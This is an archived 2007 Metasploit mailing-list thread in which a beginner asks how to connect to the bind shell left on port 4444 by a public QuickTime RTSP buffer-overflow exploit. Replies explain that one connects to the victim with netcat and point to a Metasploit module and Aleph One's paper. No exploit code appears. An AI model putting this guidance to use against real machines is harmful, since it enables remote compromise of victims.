[framework] question on Apple Quicktime RTSP bind/attach process
Jeffs
jeffs at speakeasy.net
Tue Nov 27 15:54:08 CST 2007
Thanks for making that clear.
base wrote:
> The payload in question is a standard bindshell, meaning it listens on
> the victims machine for an incoming connection. Only the initial
> exploitation process involves the target connecting to the host machine.
>
> If these facts were not terribly obvious to you, you've gotten far
> ahead of yourself and should read up on the basics like suggested
> earlier in this thread.
> you will find a wealth of information from older projects and papers
> detailing basic shellcode and exploitation.
> Aleph 1s paper, 'smashing the stack for fun & profit' is still helpful
> for a beginner even though it is over a decade old.
>
> Jeffs wrote:
>> Are you sure the payload opens a listening socket on the *victim's*
>> machine? * The way I understand that sploit to work is it allows the
>> attacker to listen for a connection whilst at the same time listening
>> on another port (4444) for a connection from the victims machine.
>> The sploit creates an RTSP server that waits for a connection, then
>> sends code to the victim having them contact the attacher's machine.
>> Kurt Grutzmacher wrote:
>>> You should learn more about buffer overflows before you get too deep
>>> into any code. There are a ton of resources on the web that a quick
>>> google will direct you towards.
>>>
>>> But to quickly answer your question, the payload shellcode provides the
>>> instructions to open a listener socket on port 4444 on the victim's
>>> machine that you connect to with netcat. It's assembly code because the
>>> overflow allowed us to execute it.
>>>
>>> The script you linked to just uses the shellcode generated by
>>> metasploit.
>>> It doesn't integrate within the framework. An exploit has been written
>>> and is available in the current svn trunk.
>>>
>>> On Tue, Nov 27, 2007 at 09:20:31AM -0500, Jeffs wrote:
>>>
>>>> Regarding
>>>>
>>>> http://www.securityfocus.com/data/vulnerabilities/exploits/26549-uni.py
>>>>
>>>>
>>>> which is the Apple QuickTime RTSP Response Header Remote Stack
>>>> Based Buffer Overflow Vulnerability -- as a newbie I have a simple
>>>> question.
>>>>
>>>> I understand the code behind the exploit in theory, but am confused
>>>> about how one would successfully attach or bind to the process that
>>>> is sitting at port 4444 (assuming you used that value as per the
>>>> code) to get the reverse shell? Netcat wouldn't do it because
>>>> there is no netcat process being sent to the attacking machine. If
>>>> you could integrate it into metasploit then I understand you would
>>>> have a "session". But this is a python script. How does one
>>>> integrate it into metasploit if at all. If not, how does the
>>>> attacking machine attach to the bind process coming in on port 4444?
>>>>
>>>> Thank you from a newbie
>>>>
>>>
>>>
>>
>
>
>
More information about the framework
mailing list